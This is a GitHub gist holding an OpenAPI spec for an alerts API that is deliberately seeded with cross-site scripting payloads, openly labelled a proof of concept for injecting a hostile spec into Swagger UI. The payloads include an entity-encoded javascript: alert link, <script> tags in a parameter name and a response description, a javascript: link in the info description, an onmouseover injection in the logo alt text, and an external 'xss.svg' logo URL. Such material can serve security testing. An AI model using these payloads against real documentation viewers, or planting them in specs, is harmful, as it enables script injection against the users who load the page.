Skip to content

Instantly share code, notes, and snippets.

@xElkomy

xElkomy/SwaggerXSS.json

Last active August 9, 2021 22:09
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save xElkomy/e21a68e6ba946d7da3e4dc9ddfd31953 to your computer and use it in GitHub Desktop.
Save xElkomy/e21a68e6ba946d7da3e4dc9ddfd31953 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
SwaggerXSS.json
{
"components": {
"parameters": {
"alert": {
"description": "[xElkomyistoooooooooooooooooooooooooooooooooooooooooooooooooooo](&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29)",
"explode": false,
"in": "path",
"name": "<script>console.log(‘000000000000000000dad0000000000000000000');</script>",
"required": true,
"schema": {
"example": "alt-asdf1234",
"pattern": "^[A-Za-z][A-Za-z0-9-]+$",
"type": "string"
},
"style": "simple"
}
},
"responses": {
"ApiErrorsResponse": {
"content": {
"application/json": {
"schema": {
"properties": {
"errors": {
"description": "List of errors that occurred while processing the request.",
"items": {
"$ref": "#/components/schemas/ApiError"
},
"minItems": 1,
"type": "array"
}
},
"type": "object"
}
}
},
"description": "<script>alert('xElkomy')</script>"
}
},
"schemas": {
"Alert": {
"example": {
"crit": {
"operator": "<",
"value": 5
},
"info": {
"operator": "<",
"value": 5
},
"name": "name",
"post_to": "",
"warn": {
"operator": "<",
"value": 5
}
},
"properties": {
"crit": {
"$ref": "#/components/schemas/threshold"
},
"field": {
"$ref": "#/components/schemas/field"
},
"info": {
"$ref": "#/components/schemas/threshold"
},
"name": {
"description": "unique name for this alert",
"pattern": "^[A-Za-z][A-Za-z0-9-]+$",
"type": "string"
},
"operation": {
"$ref": "#/components/schemas/operation"
},
"period": {
"$ref": "#/components/schemas/period"
},
"post_to": {
"pattern": "^https://"
},
"warn": {
"$ref": "#/components/schemas/threshold"
},
"window": {
"$ref": "#/components/schemas/window"
}
},
"required": [
"field",
"name",
"operation",
"period",
"post_to",
"window"
],
"type": "object"
},
"ApiError": {
"properties": {
"detail": {
"description": "Explanation of what exactly went wrong.",
"type": "string"
},
"href": {
"description": "Request URL.",
"type": "string"
},
"status": {
"description": "HTTP status code.",
"type": "integer"
},
"title": {
"description": "High-level reason of why the request failed.",
"type": "string"
}
},
"type": "object"
},
"CreateAlertRequest": {
"$ref": "#/components/schemas/Alert"
},
"field": {
"description": "Data to query",
"enum": [
"record_usage.count",
"upstream_responses.count",
"upstream_traffic.traffic_bytes",
"upstream_latency.count"
],
"type": "string"
},
"inline_response_200": {
"example": {
"alerts": [
{
"crit": {
"operator": "<",
"value": 5
},
"info": {
"operator": "<",
"value": 5
},
"name": "name",
"post_to": "",
"warn": {
"operator": "<",
"value": 5
}
},
{
"crit": {
"operator": "<",
"value": 5
},
"info": {
"operator": "<",
"value": 5
},
"name": "name",
"post_to": "",
"warn": {
"operator": "<",
"value": 5
}
}
]
},
"properties": {
"alerts": {
"description": "List of stored values along with their aliases.",
"items": {
"$ref": "#/components/schemas/Alert"
},
"type": "array"
}
}
},
"inline_response_200_1": {
"example": {
"alerts": [
{
"crit": {
"operator": "<",
"value": 5
},
"info": {
"operator": "<",
"value": 5
},
"name": "name",
"post_to": "",
"warn": {
"operator": "<",
"value": 5
}
}
]
},
"properties": {
"alerts": {
"description": "The retrieved alert.",
"items": {
"$ref": "#/components/schemas/Alert"
},
"maxItems": 1,
"minItems": 1,
"type": "array"
}
}
},
"operation": {
"enum": [
"sum",
"mean",
"max",
"min"
],
"type": "string"
},
"period": {
"description": "How often to run this check",
"enum": [
"1m",
"5m",
"10m",
"30m",
"60m",
"12h",
"24h"
],
"type": "string"
},
"threshold": {
"example": {
"operator": "<",
"value": 5
},
"properties": {
"operator": {
"enum": [
"<",
"<=",
">",
">=",
"=="
],
"type": "string"
},
"value": {
"description": "Positive integer value",
"example": 5,
"type": "integer"
}
},
"required": [
"operator",
"value"
],
"type": "object"
},
"window": {
"description": "Window to query data across",
"enum": [
"1m",
"5m",
"10m",
"30m",
"60m",
"12h",
"24h"
],
"type": "string"
}
},
"securitySchemes": {
"jwt": {
"bearerFormat": "JWT",
"scheme": "bearer",
"type": "http",
"x-bearerInfoFunc": "impi.security.decode_token"
}
}
},
"externalDocs": {
"description": "xElkomy is here",
"url": "https://xelkomy.com"
},
"info": {
"contact": {
"email": "khaled.mohamed@xelkomy.com"
},
"description": "xelkomyishere # [Here is the demo link we provided you](javascript:doevil(readfileandsenddata)) #xElkomy PoC Inject External JsonFile \n",
"title": "xElkomy PoC",
"version": "0.1.0",
"x-logo": {
"altText": "Very Good Security Logo #![a\"onmouseover=alert`1`](https://www.google.com/image.png\"'onmouseover=alert(1)'",
"href": "https://www.xelkomy.com",
"url": "https://mytool-xelkomy.s3.eu-central-1.amazonaws.com/xss.svg"
}
},
"openapi": "3.0.0",
"paths": {
"/alerts": {
"get": {
"description": "Show all alerts\n",
"operationId": "fetch_alerts",
"responses": {
"200": {
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/inline_response_200"
}
}
},
"description": "OK"
}
},
"summary": "List alerts",
"tags": [
"alerts"
],
"x-openapi-router-controller": "openapi_server.controllers.alerts_controller"
}
},
"/alerts/{alert}": {
"delete": {
"description": "Removes a single alert.\n",
"operationId": "delete_alert",
"parameters": [
{
"description": "Alert to operate on.",
"explode": false,
"in": "path",
"name": "alert",
"required": true,
"schema": {
"example": "alt-asdf1234",
"pattern": "^[A-Za-z][A-Za-z0-9-]+$",
"type": "string"
},
"style": "simple"
}
],
"responses": {
"204": {
"description": "No Content"
}
},
"summary": "Delete an alert",
"tags": [
"alerts"
],
"x-openapi-router-controller": "openapi_server.controllers.alerts_controller"
},
"get": {
"description": "Retrieves an alert",
"operationId": "get_alert",
"parameters": [
{
"description": "Alert to operate on.",
"explode": false,
"in": "path",
"name": "alert",
"required": true,
"schema": {
"example": "alt-asdf1234",
"pattern": "^[A-Za-z][A-Za-z0-9-]+$",
"type": "string"
},
"style": "simple"
}
],
"responses": {
"200": {
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/inline_response_200_1"
}
}
},
"description": "OK"
}
},
"summary": "Get an alert",
"tags": [
"alerts"
],
"x-openapi-router-controller": "openapi_server.controllers.alerts_controller"
},
"post": {
"description": "Creates a single alert.\n",
"operationId": "create_alert",
"parameters": [
{
"description": "Alert to operate on.",
"explode": false,
"in": "path",
"name": "alert",
"required": true,
"schema": {
"example": "alt-asdf1234",
"pattern": "^[A-Za-z][A-Za-z0-9-]+$",
"type": "string"
},
"style": "simple"
}
],
"requestBody": {
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/CreateAlertRequest"
}
}
}
},
"responses": {
"201": {
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/Alert"
}
}
},
"description": "Created"
}
},
"summary": "Create an alert",
"tags": [
"alerts"
],
"x-openapi-router-controller": "openapi_server.controllers.alerts_controller"
},
"put": {
"description": "Update an alert\n",
"operationId": "update_alert",
"parameters": [
{
"description": "Alert to operate on.",
"explode": false,
"in": "path",
"name": "alert",
"required": true,
"schema": {
"example": "alt-asdf1234",
"pattern": "^[A-Za-z][A-Za-z0-9-]+$",
"type": "string"
},
"style": "simple"
}
],
"requestBody": {
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/CreateAlertRequest"
}
}
}
},
"responses": {
"200": {
"description": "OK"
}
},
"summary": "Update an alert",
"tags": [
"alerts"
],
"x-openapi-router-controller": "openapi_server.controllers.alerts_controller"
}
},
"/health": {
"get": {
"description": "Healthy or no",
"operationId": "get_health",
"responses": {
"200": {
"content": {
"text/plain": {
"schema": {
"example": "pong",
"type": "string"
}
}
},
"description": "OK"
}
},
"summary": "Return health of API",
"x-openapi-router-controller": "openapi_server.controllers.default_controller"
}
}
},
"security": [
{
"jwt": []
}
],
"servers": [
{
"url": ""
}
]
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment